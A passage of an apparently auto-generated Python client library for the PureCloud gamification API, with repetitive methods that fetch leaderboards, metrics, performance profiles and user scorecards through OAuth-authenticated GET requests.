:return: Leaderboard
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_workday', 'end_workday', 'metric_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_leaderboard" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_leaderboard`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_leaderboard`")
resource_path = '/api/v2/gamification/leaderboard'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'metric_id' in params:
query_params['metricId'] = params['metric_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Leaderboard',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_leaderboard_all(self, filter_type, filter_id, start_workday, end_workday, **kwargs):
"""
Leaderboard by division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_leaderboard_all(filter_type, filter_id, start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. For example, division Id (required)
:param date start_workday: Start workday to retrieve for the leaderboard. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday to retrieve for the leaderboard. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str metric_id: Metric Id for which the leaderboard is to be generated. The total points is used if nothing is given.
:return: Leaderboard
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id', 'start_workday', 'end_workday', 'metric_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_leaderboard_all" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_leaderboard_all`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_leaderboard_all`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_leaderboard_all`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_leaderboard_all`")
resource_path = '/api/v2/gamification/leaderboard/all'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'metric_id' in params:
query_params['metricId'] = params['metric_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Leaderboard',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_leaderboard_all_bestpoints(self, filter_type, filter_id, **kwargs):
"""
Best Points by division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_leaderboard_all_bestpoints(filter_type, filter_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. For example, division Id (required)
:return: OverallBestPoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_leaderboard_all_bestpoints" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_leaderboard_all_bestpoints`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_leaderboard_all_bestpoints`")
resource_path = '/api/v2/gamification/leaderboard/all/bestpoints'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OverallBestPoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_leaderboard_bestpoints(self, **kwargs):
"""
Best Points of the requesting user's division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_leaderboard_bestpoints(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: OverallBestPoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_leaderboard_bestpoints" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/leaderboard/bestpoints'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OverallBestPoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_metric(self, metric_id, **kwargs):
"""
Gamified metric by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_metric(metric_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str metric_id: metric Id (required)
:return: Metric
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['metric_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_metric" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'metric_id' is set
if ('metric_id' not in params) or (params['metric_id'] is None):
raise ValueError("Missing the required parameter `metric_id` when calling `get_gamification_metric`")
resource_path = '/api/v2/gamification/metrics/{metricId}'.replace('{format}', 'json')
path_params = {}
if 'metric_id' in params:
path_params['metricId'] = params['metric_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Metric',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_metricdefinition(self, metric_definition_id, **kwargs):
"""
Metric definition by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_metricdefinition(metric_definition_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str metric_definition_id: metric definition id (required)
:return: MetricDefinition
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['metric_definition_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_metricdefinition" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'metric_definition_id' is set
if ('metric_definition_id' not in params) or (params['metric_definition_id'] is None):
raise ValueError("Missing the required parameter `metric_definition_id` when calling `get_gamification_metricdefinition`")
resource_path = '/api/v2/gamification/metricdefinitions/{metricDefinitionId}'.replace('{format}', 'json')
path_params = {}
if 'metric_definition_id' in params:
path_params['metricDefinitionId'] = params['metric_definition_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MetricDefinition',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_metricdefinitions(self, **kwargs):
"""
All metric definitions
Retrieves the metric definitions and their corresponding default objectives used to create a gamified metric
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_metricdefinitions(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: GetMetricDefinitionsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_metricdefinitions" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/metricdefinitions'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetMetricDefinitionsResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_metrics(self, **kwargs):
"""
All gamified metrics for a given profile
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_metrics(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str performance_profile_id: The profile id of the metrics you are trying to retrieve. The DEFAULT profile is used if nothing is given.
:return: GetMetricsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['performance_profile_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_metrics" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/metrics'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'performance_profile_id' in params:
query_params['performance profile id'] = params['performance_profile_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetMetricsResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_profile(self, performance_profile_id, **kwargs):
"""
Performance profile by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_profile(performance_profile_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str performance_profile_id: Performance Profile Id (required)
:return: PerformanceProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['performance_profile_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'performance_profile_id' is set
if ('performance_profile_id' not in params) or (params['performance_profile_id'] is None):
raise ValueError("Missing the required parameter `performance_profile_id` when calling `get_gamification_profile`")
resource_path = '/api/v2/gamification/profiles/{performanceProfileId}'.replace('{format}', 'json')
path_params = {}
if 'performance_profile_id' in params:
path_params['performanceProfileId'] = params['performance_profile_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PerformanceProfile',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_profiles(self, **kwargs):
"""
All performance profiles
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_profiles(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: GetProfilesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_profiles" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/profiles'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetProfilesResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards(self, workday, **kwargs):
"""
Workday performance metrics of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards(workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date workday: Target querying workday. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param list[str] expand: Which fields, if any, to expand.
:return: WorkdayMetricListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workday', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards`")
resource_path = '/api/v2/gamification/scorecards'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'workday' in params:
query_params['workday'] = params['workday']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayMetricListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_attendance(self, start_workday, end_workday, **kwargs):
"""
Attendance status metrics of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_attendance(start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: AttendanceStatusListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_workday', 'end_workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_attendance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_attendance`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_attendance`")
resource_path = '/api/v2/gamification/scorecards/attendance'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AttendanceStatusListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_bestpoints(self, **kwargs):
"""
Best points of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_bestpoints(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UserBestPoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_bestpoints" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/scorecards/bestpoints'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserBestPoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_points_alltime(self, end_workday, **kwargs):
"""
All-time points of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_points_alltime(end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: AllTimePoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['end_workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_points_alltime" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_points_alltime`")
resource_path = '/api/v2/gamification/scorecards/points/alltime'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AllTimePoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_points_average(self, workday, **kwargs):
"""
Average points of the requesting user's division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_points_average(workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date workday: The target workday. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: SingleWorkdayAveragePoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workday']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_points_average" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_points_average`")
resource_path = '/api/v2/gamification/scorecards/points/average'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'workday' in params:
query_params['workday'] = params['workday']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SingleWorkdayAveragePoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_points_trends(self, start_workday, end_workday, **kwargs):
"""
Points trends of the requesting user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_points_trends(start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str day_of_week: Optional filter to specify which day of weeks to be included in the response
:return: WorkdayPointsTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_workday', 'end_workday', 'day_of_week']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_points_trends" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_scorecards_points_trends`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_scorecards_points_trends`")
resource_path = '/api/v2/gamification/scorecards/points/trends'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'day_of_week' in params:
query_params['dayOfWeek'] = params['day_of_week']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayPointsTrend',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user(self, user_id, workday, **kwargs):
"""
Workday performance metrics for a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user(user_id, workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date workday: Target querying workday. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param list[str] expand: Which fields, if any, to expand.
:return: WorkdayMetricListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'workday', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_scorecards_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_gamification_scorecards_user`")
# verify the required parameter 'workday' is set
if ('workday' not in params) or (params['workday'] is None):
raise ValueError("Missing the required parameter `workday` when calling `get_gamification_scorecards_user`")
resource_path = '/api/v2/gamification/scorecards/users/{userId}'.replace('{format}', 'json')
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id']
query_params = {}
if 'workday' in params:
query_params['workday'] = params['workday']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkdayMetricListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_scorecards_user_attendance(self, user_id, start_workday, end_workday, **kwargs):
"""
Attendance status metrics for a user
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_scorecards_user_attendance(user_id, start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str user_id: (required)
:param date start_workday: Start workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday of querying workdays range. Workday is represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:return: AttendanceStatusListing
If the method is called asynchronously,
returns the request thread.
"""
